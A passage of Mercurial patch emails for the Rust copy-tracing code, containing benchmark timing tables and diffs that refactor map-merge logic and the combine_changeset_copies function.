x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.293564 s, 0.297563 s, +0.003999 s, × 1.0136, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.286595 s, 0.282463 s, -0.004132 s, × 0.9856, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.083256 s, 0.084038 s, +0.000782 s, × 1.0094, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027282 s, 0.027306 s, +0.000024 s, × 1.0009, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.343373 s, 1.465264 s, +0.121891 s, × 1.0907, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.665737 s, 0.690376 s, +0.024639 s, × 1.0370, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.011322 s, -1.126847 s, × 0.7807, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.573276 s, 0.573541 s, +0.000265 s, × 1.0005, 16 µs/rev mozilla-try 
x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 3.981133 s, -1.146676 s, × 0.7764, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 3.996647 s, -0.974489 s, × 0.8040, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.741678 s, 1.520607 s, -0.221071 s, × 0.8731, 7 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 50.244975 s, +9.930153 s, × 1.2463, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 20.048029 s, 20.030023 s, -0.018006 s, × 0.9991, 52 µs/rev private : 459513 revs, 37.179470 s, 24.490825 s, -12.688645 s, × 0.6587, 53 µs/rev ### Compared to the filelog based copy tracing Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000918 s, 0.000041 s, -0.000877 s, × 0.044662, 40 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.001853 s, 0.000116 s, -0.001737 s, × 0.062601, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.018994 s, 0.004933 s, -0.014061 s, × 0.259714, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.001532 s, 0.000193 s, -0.001339 s, × 0.125979, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.210633 s, 0.000048 s, -0.210585 s, × 0.000228, 47 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.017041 s, 0.000114 s, -0.016927 s, × 0.006690, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.019474 s, 0.000319 s, -0.019155 s, × 0.016381, 318 µs/rev 
pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.763136 s, 0.012025 s, -0.751111 s, × 0.015757, 2003 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 1.226569 s, 0.050525 s, -1.176044 s, × 0.041192, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 1.314572 s, 0.085713 s, -1.228859 s, × 0.065202, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 1.686022 s, 0.061825 s, -1.624197 s, × 0.036669, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.001110 s, 0.543998 s, +0.542888 s, × 490.0882, 12 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 1.106265 s, 0.013455 s, -1.092810 s, × 0.012163, 6724 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 1.377398 s, 0.117479 s, -1.259919 s, × 0.085291, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.028579 s, 0.000084 s, -0.028495 s, × 0.002939, 41 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.133644 s, 0.000111 s, -0.133533 s, × 0.000831, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.025988 s, 0.000175 s, -0.025813 s, × 0.006734, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.053011 s, 0.000732 s, -0.052279 s, × 0.013808, 81 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.037858 s, 0.010062 s, -0.027796 s, × 0.265783, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.200517 s, 0.015659 s, -0.184858 s, × 0.078093, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.964542 s, 0.062744 s, -0.901798 s, × 0.065051, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 3.976210 s, 0.499449 s, -3.476761 s, × 
0.125609, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.025172 s, 0.000088 s, -0.025084 s, × 0.003496, 43 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.145144 s, 0.000266 s, -0.144878 s, × 0.001833, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.026139 s, 0.000182 s, -0.025957 s, × 0.006963, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.086184 s, 0.000656 s, -0.085528 s, × 0.007612, 93 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.203187 s, 0.003389 s, -0.199798 s, × 0.016679, 1129 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 2.255675 s, 0.075882 s, -2.179793 s, × 0.033640, 12644 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.091147 s, 0.006479 s, -0.084668 s, × 0.071083, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.767530 s, 0.004889 s, -0.762641 s, × 0.006370, 119 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 1.185330 s, 0.064394 s, -1.120936 s, × 0.054326, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 6.831179 s, 0.026815 s, -6.804364 s, × 0.003925, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 3.373551 s, 0.202864 s, -3.170687 s, × 0.060134, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 16.540604 s, 1.219445 s, -15.321159 s, × 0.073724, 7 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 21.527155 s, 1.613857 s, -19.913298 s, × 0.074968, 7 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.084540 s, 0.000873 s, -0.083667 s, × 
0.010326, 436 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.507151 s, 0.000885 s, -0.506266 s, × 0.001745, 442 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.021748 s, 0.000161 s, -0.021587 s, × 0.007403, 40 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.236786 s, 0.001138 s, -0.235648 s, × 0.004806, 568 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 1.111735 s, 0.033399 s, -1.078336 s, × 0.030042, 33365 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 2.228030 s, 0.075445 s, -2.152585 s, × 0.033862, 12572 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.091289 s, 0.006456 s, -0.084833 s, × 0.070720, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.771361 s, 0.005462 s, -0.765899 s, × 0.007081, 133 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 1.189483 s, 0.064117 s, -1.125366 s, × 0.053903, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.089756 s, 0.297563 s, +0.207807 s, × 3.315244, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.084888 s, 0.282463 s, +0.197575 s, × 3.327479, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 7.682665 s, 0.084038 s, -7.598627 s, × 0.010939, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 6.894680 s, 0.027306 s, -6.867374 s, × 0.003960, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 7.650907 s, 1.465264 s, -6.185643 s, × 0.191515, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 9.898788 s, 0.690376 s, -9.208412 s, × 0.069743, 13 µs/rev mozilla-try 
x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 0.092208 s, 4.011322 s, +3.919114 s, × 43.50297, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 28.130003 s, 0.573541 s, -27.556462 s, × 0.020389, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 0.093366 s, 3.981133 s, +3.887767 s, × 42.64007, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 0.229368 s, 3.996647 s, +3.767279 s, × 17.42460, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 19.624851 s, 1.520607 s, -18.104244 s, × 0.077484, 7 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 22.070126 s, 50.244975 s, +28.174849 s, × 2.276606, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 26.006524 s, 20.030023 s, -5.976501 s, × 0.770192, 52 µs/rev private : 459513 revs, 18.704612 s, 24.490825 s, +5.786213 s, × 1.309347, 53 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9656 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -6,10 +6,10 @@ use im_rc::ordmap::DiffItem; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; +use im_rc::OrdSet; use std::cmp::Ordering; use std::collections::HashMap; -use std::collections::HashSet; use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; @@ -25,7 +25,7 @@ path: Option<PathToken>, /// a set of previous `CopySource.rev` value directly or indirectly /// overwritten by this one. 
- overwritten: HashSet<Revision>, + overwritten: OrdSet<Revision>, } impl CopySource { @@ -36,7 +36,7 @@ Self { rev, path, - overwritten: HashSet::new(), + overwritten: OrdSet::new(), } } @@ -45,7 +45,7 @@ /// Use this when merging two InternalPathCopies requires active merging of /// some entries. fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { - let mut overwritten = HashSet::new(); + let mut overwritten = OrdSet::new(); overwritten.extend(winner.overwritten.iter().copied()); overwritten.extend(loser.overwritten.iter().copied()); overwritten.insert(winner.rev); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1608720496 -3600 # Wed Dec 23 11:48:16 2020 +0100 # Node ID 435d9fc72646c164dac7079dbdba9ba245c01740 # Parent 60b2b7ecf9cbd30d14ee8fd26f15ae3f942566b2 copies-rust: extract generic map merge logic from merge_copies_dict This deduplicates the copy-tracing-specific logic Differential Revision: https://phab.mercurial-scm.org/D9682 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -3,7 +3,6 @@ use crate::Revision; use crate::NULL_REVISION; -use im_rc::ordmap::DiffItem; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; use im_rc::OrdSet; @@ -624,210 +623,40 @@ fn merge_copies_dict( path_map: &TwoWayPathMap, current_merge: Revision, - mut minor: InternalPathCopies, - mut major: InternalPathCopies, + minor: InternalPathCopies, + major: InternalPathCopies, changes: &ChangedFiles, ) -> InternalPathCopies { - // This closure exist as temporary help while multiple developper are - // actively working on this code. Feel free to re-inline it once this - // code is more settled. 
- let cmp_value = - |dest: &PathToken, src_minor: &CopySource, src_major: &CopySource| { - compare_value( - path_map, + use crate::utils::{ordmap_union_with_merge, MergeResult}; + + ordmap_union_with_merge(minor, major, |dest, src_minor, src_major| { + let (pick, overwrite) = compare_value( + path_map, + current_merge, + changes, + dest, + src_minor, + src_major, + ); + if overwrite { + let (winner, loser) = match pick { + MergePick::Major | MergePick::Any => (src_major, src_minor), + MergePick::Minor => (src_minor, src_major), + }; + MergeResult::UseNewValue(CopySource::new_from_merge( current_merge, - changes, - dest, - src_minor, - src_major, - ) - }; - if minor.is_empty() { - major - } else if major.is_empty() { - minor - } else if minor.len() * 2 < major.len() { - // Lets says we are merging two InternalPathCopies instance A and B. - // - // If A contains N items, the merge result will never contains more - // than N values differents than the one in A - // - // If B contains M items, with M > N, the merge result will always - // result in a minimum of M - N value differents than the on in - // A - // - // As a result, if N < (M-N), we know that simply iterating over A will - // yield less difference than iterating over the difference - // between A and B. - // - // This help performance a lot in case were a tiny - // InternalPathCopies is merged with a much larger one. 
- for (dest, src_minor) in minor { - let src_major = major.get(&dest); - match src_major { - None => { - major.insert(dest, src_minor); - } - Some(src_major) => { - let (pick, overwrite) = - cmp_value(&dest, &src_minor, src_major); - if overwrite { - let src = match pick { - MergePick::Major => CopySource::new_from_merge( - current_merge, - src_major, - &src_minor, - ), - MergePick::Minor => CopySource::new_from_merge( - current_merge, - &src_minor, - src_major, - ), - MergePick::Any => CopySource::new_from_merge( - current_merge, - src_major, - &src_minor, - ), - }; - major.insert(dest, src); - } else { - match pick { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => major.insert(dest, src_minor), - }; - } - } - }; - } - major - } else if major.len() * 2 < minor.len() { - // This use the same rational than the previous block. - // (Check previous block documentation for details.) - for (dest, src_major) in major { - let src_minor = minor.get(&dest); - match src_minor { - None => { - minor.insert(dest, src_major); + winner, + loser, + )) + } else { + match pick { + MergePick::Any | MergePick::Major => { + MergeResult::UseRightValue } - Some(src_minor) => { - let (pick, overwrite) = - cmp_value(&dest, src_minor, &src_major); - if overwrite { - let src = match pick { - MergePick::Major => CopySource::new_from_merge( - current_merge, - &src_major, - src_minor, - ), - MergePick::Minor => CopySource::new_from_merge( - current_merge, - src_minor, - &src_major, - ), - MergePick::Any => CopySource::new_from_merge( - current_merge, - &src_major, - src_minor, - ), - }; - minor.insert(dest, src); - } else { - match pick { - MergePick::Any | MergePick::Minor => None, - MergePick::Major => minor.insert(dest, src_major), - }; - } - } - }; - } - minor - } else { - let mut override_minor = Vec::new(); - let mut override_major = Vec::new(); - - let mut to_major = |k: &PathToken, v: &CopySource| { - override_major.push((k.clone(), v.clone())) - }; - let mut to_minor 
= |k: &PathToken, v: &CopySource| { - override_minor.push((k.clone(), v.clone())) - }; - - // The diff function leverage detection of the identical subpart if - // minor and major has some common ancestors. This make it very - // fast is most case. - // - // In case where the two map are vastly different in size, the current - // approach is still slowish because the iteration will iterate over - // all the "exclusive" content of the larger on. This situation can be - // frequent when the subgraph of revision we are processing has a lot - // of roots. Each roots adding they own fully new map to the mix (and - // likely a small map, if the path from the root to the "main path" is - // small. - // - // We could do better by detecting such situation and processing them - // differently. - for d in minor.diff(&major) { - match d { - DiffItem::Add(k, v) => to_minor(k, v), - DiffItem::Remove(k, v) => to_major(k, v), - DiffItem::Update { old, new } => { - let (dest, src_major) = new; - let (_, src_minor) = old; - let (pick, overwrite) = - cmp_value(dest, src_minor, src_major); - if overwrite { - let src = match pick { - MergePick::Major => CopySource::new_from_merge( - current_merge, - src_major, - src_minor, - ), - MergePick::Minor => CopySource::new_from_merge( - current_merge, - src_minor, - src_major, - ), - MergePick::Any => CopySource::new_from_merge( - current_merge, - src_major, - src_minor, - ), - }; - to_minor(dest, &src); - to_major(dest, &src); - } else { - match pick { - MergePick::Major => to_minor(dest, src_major), - MergePick::Minor => to_major(dest, src_minor), - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => unreachable!(), - } - } - } - }; - } - - let updates; - let mut result; - if override_major.is_empty() { - result = major - } else if override_minor.is_empty() { - result = minor - } else { - if override_minor.len() < override_major.len() { - updates = override_minor; - result 
= minor; - } else { - updates = override_major; - result = major; - } - for (k, v) in updates { - result.insert(k, v); + MergePick::Minor => MergeResult::UseLeftValue, } } - result - } + }) } /// represent the side that should prevail when merging two diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -9,6 +9,8 @@ use crate::errors::{HgError, IoErrorContext}; use crate::utils::hg_path::HgPath; +use im_rc::ordmap::DiffItem; +use im_rc::ordmap::OrdMap; use std::{io::Write, ops::Deref}; pub mod files; @@ -199,3 +201,151 @@ context: IoErrorContext::CurrentExe, }) } + +pub(crate) enum MergeResult<V> { + UseLeftValue, + UseRightValue, + UseNewValue(V), +} + +/// Return the union of the two given maps, +/// calling `merge(key, left_value, right_value)` to resolve keys that exist in +/// both. +/// +/// CC https://github.com/bodil/im-rs/issues/166 +pub(crate) fn ordmap_union_with_merge<K, V>( + left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + if left.ptr_eq(&right) { + // One of the two maps is an unmodified clone of the other + left + } else if left.len() / 2 > right.len() { + // When two maps have different sizes, + // their size difference is a lower bound on + // how many keys of the larger map are not also in the smaller map. + // This in turn is a lower bound on the number of differences in + // `OrdMap::diff` and the "amount of work" that would be done + // by `ordmap_union_with_merge_by_diff`. + // + // Here `left` is more than twice the size of `right`, + // so the number of differences is more than the total size of + // `right`. Therefore an algorithm based on iterating `right` + // is more efficient. + // + // This helps a lot when a tiny (or empty) map is merged + // with a large one. 
+ ordmap_union_with_merge_by_iter(left, right, merge) + } else if left.len() < right.len() / 2 { + // Same as above but with `left` and `right` swapped + ordmap_union_with_merge_by_iter(right, left, |key, a, b| { + // Also swapped in `merge` arguments: + match merge(key, b, a) { + MergeResult::UseNewValue(v) => MergeResult::UseNewValue(v), + // … and swap back in `merge` result: + MergeResult::UseLeftValue => MergeResult::UseRightValue, + MergeResult::UseRightValue => MergeResult::UseLeftValue, + } + }) + } else { + // For maps of similar size, use the algorithm based on `OrdMap::diff` + ordmap_union_with_merge_by_diff(left, right, merge) + } +} + +/// Efficient if `right` is much smaller than `left` +fn ordmap_union_with_merge_by_iter<K, V>( + mut left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone, +{ + for (key, right_value) in right { + match left.get(&key) { + None => { + left.insert(key, right_value); + } + Some(left_value) => match merge(&key, left_value, &right_value) { + MergeResult::UseLeftValue => {} + MergeResult::UseRightValue => { + left.insert(key, right_value); + } + MergeResult::UseNewValue(new_value) => { + left.insert(key, new_value); + } + }, + } + } + left +} + +/// Fallback when both maps are of similar size +fn ordmap_union_with_merge_by_diff<K, V>( + mut left: OrdMap<K, V>, + mut right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + // (key, value) pairs that would need to be inserted in either map + // in order to turn it into the union. + // + // TODO: if/when https://github.com/bodil/im-rs/pull/168 is accepted, + // change these from `Vec<(K, V)>` to `Vec<(&K, Cow<V>)>` + // with `left_updates` only borrowing from `right` and `right_updates` from + // `left`, and with `Cow::Owned` used for `MergeResult::UseNewValue`. 
+ // + // This would allow moving all `.clone()` calls to after we’ve decided + // which of `right_updates` or `left_updates` to use + // (value ones becoming `Cow::into_owned`), + // and avoid making clones we don’t end up using. + let mut left_updates = Vec::new(); + let mut right_updates = Vec::new(); + + for difference in left.diff(&right) { + match difference { + DiffItem::Add(key, value) => { + left_updates.push((key.clone(), value.clone())) + } + DiffItem::Remove(key, value) => { + right_updates.push((key.clone(), value.clone())) + } + DiffItem::Update { + old: (key, left_value), + new: (_, right_value), + } => match merge(key, left_value, right_value) { + MergeResult::UseLeftValue => { + right_updates.push((key.clone(), left_value.clone())) + } + MergeResult::UseRightValue => { + left_updates.push((key.clone(), right_value.clone())) + } + MergeResult::UseNewValue(new_value) => { + left_updates.push((key.clone(), new_value.clone())); + right_updates.push((key.clone(), new_value)) + } + }, + } + } + if left_updates.len() < right_updates.len() { + for (key, value) in left_updates { + left.insert(key, value); + } + left + } else { + for (key, value) in right_updates { + right.insert(key, value); + } + right + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609876920 -3600 # Tue Jan 05 21:02:00 2021 +0100 # Node ID cb4b0b0c6de4b8d87f62e0a265628d003cd1c10c # Parent 435d9fc72646c164dac7079dbdba9ba245c01740 copies-rust: split up combine_changeset_copies function into a struct … such that each iteration of its former loop is now a method call, with the caller driving the loop. This entirely removes the need for the `DataHolder` hack: the method now takes a `ChangedFiles<'_>` parameter that borrows a bytes buffer that can be owned by the caller’s stack frame, just for the duration of that call. 
Differential Revision: https://phab.mercurial-scm.org/D9683 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -110,9 +110,6 @@ /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; -/// hold parent 1, parent 2 and relevant files actions. -pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); - /// represent the files affected by a changesets /// /// This hold a subset of mercurial.metadata.ChangingFiles as we do not need @@ -334,22 +331,6 @@ } } -/// A small struct whose purpose is to ensure lifetime of bytes referenced in -/// ChangedFiles -/// -/// It is passed to the RevInfoMaker callback who can assign any necessary -/// content to the `data` attribute. The copy tracing code is responsible for -/// keeping the DataHolder alive at least as long as the ChangedFiles object. -pub struct DataHolder<D> { - /// RevInfoMaker callback should assign data referenced by the - /// ChangedFiles struct it return to this attribute. The DataHolder - /// lifetime will be at least as long as the ChangedFiles one. - pub data: Option<D>, -} - -pub type RevInfoMaker<'a, D> = - Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>; - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// @@ -382,82 +363,89 @@ } /// Same as mercurial.copies._combine_changeset_copies, but in Rust. -/// -/// Arguments are: -/// -/// revs: all revisions to be considered -/// children: a {parent ? 
[childrens]} mapping -/// target_rev: the final revision we are combining copies to -/// rev_info(rev): callback to get revision information: -/// * first parent -/// * second parent -/// * ChangedFiles -/// isancestors(low_rev, high_rev): callback to check if a revision is an -/// ancestor of another -pub fn combine_changeset_copies<D>( - revs: Vec<Revision>, - mut children_count: HashMap<Revision, usize>, - target_rev: Revision, - rev_info: RevInfoMaker<D>, -) -> PathCopies { - let mut all_copies = HashMap::new(); +pub struct CombineChangesetCopies { + all_copies: HashMap<Revision, InternalPathCopies>, + path_map: TwoWayPathMap, + children_count: HashMap<Revision, usize>, +} - let mut path_map = TwoWayPathMap::default(); +impl CombineChangesetCopies { + pub fn new(children_count: HashMap<Revision, usize>) -> Self { + Self { + all_copies: HashMap::new(), + path_map: TwoWayPathMap::default(), + children_count, + } + } - for rev in revs { - let mut d: DataHolder<D> = DataHolder { data: None }; - let (p1, p2, changes) = rev_info(rev, &mut d); - - // We will chain the copies information accumulated for the parent with - // the individual copies information the curent revision. Creating a - // new TimeStampedPath for each `rev` → `children` vertex. + /// Combined the given `changes` data specific to `rev` with the data + /// previously given for its parents (and transitively, its ancestors). 
+ pub fn add_revision( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + changes: ChangedFiles<'_>, + ) { // Retrieve data computed in a previous iteration let p1_copies = match p1 { NULL_REVISION => None, _ => get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, + &mut self.all_copies, + &mut self.children_count, p1, ), // will be None if the vertex is not to be traversed }; let p2_copies = match p2 { NULL_REVISION => None, _ => get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, + &mut self.all_copies, + &mut self.children_count, p2, ), // will be None if the vertex is not to be traversed }; // combine it with data for that revision - let (p1_copies, p2_copies) = - chain_changes(&mut path_map, p1_copies, p2_copies, &changes, rev); + let (p1_copies, p2_copies) = chain_changes( + &mut self.path_map, + p1_copies, + p2_copies, + &changes, + rev, + ); let copies = match (p1_copies, p2_copies) { (None, None) => None, (c, None) => c, (None, c) => c, (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict( - &path_map, rev, p2_copies, p1_copies, &changes, + &self.path_map, + rev, + p2_copies, + p1_copies, + &changes, )), }; if let Some(c) = copies { - all_copies.insert(rev, c); + self.all_copies.insert(rev, c); } } - // Drop internal information (like the timestamp) and return the final - // mapping. - let tt_result = all_copies - .remove(&target_rev) - .expect("target revision was not processed"); - let mut result = PathCopies::default(); - for (dest, tt_source) in tt_result { - if let Some(path) = tt_source.path { - let path_dest = path_map.untokenize(dest).to_owned(); - let path_path = path_map.untokenize(path).to_owned(); - result.insert(path_dest, path_path); + /// Drop intermediate data (such as which revision a copy was from) and + /// return the final mapping. 
+ pub fn finish(mut self, target_rev: Revision) -> PathCopies { + let tt_result = self + .all_copies + .remove(&target_rev) + .expect("target revision was not processed"); + let mut result = PathCopies::default(); + for (dest, tt_source) in tt_result { + if let Some(path) = tt_source.path { + let path_dest = self.path_map.untokenize(dest).to_owned(); + let path_path = self.path_map.untokenize(path).to_owned(); + result.insert(path_dest, path_path); + } } + result } - result } /// fetch previous computed information diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -8,11 +8,8 @@ use cpython::PyTuple; use cpython::Python; -use hg::copy_tracing::combine_changeset_copies; use hg::copy_tracing::ChangedFiles; -use hg::copy_tracing::DataHolder; -use hg::copy_tracing::RevInfo; -use hg::copy_tracing::RevInfoMaker; +use hg::copy_tracing::CombineChangesetCopies; use hg::Revision; /// Combines copies information contained into revision `revs` to build a copy @@ -26,64 +23,41 @@ target_rev: Revision, rev_info: PyObject, ) -> PyResult<PyDict> { - let revs: PyResult<_> = - revs.iter(py).map(|r| Ok(r.extract(py)?)).collect(); - - // Wrap the `rev_info_maker` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. 
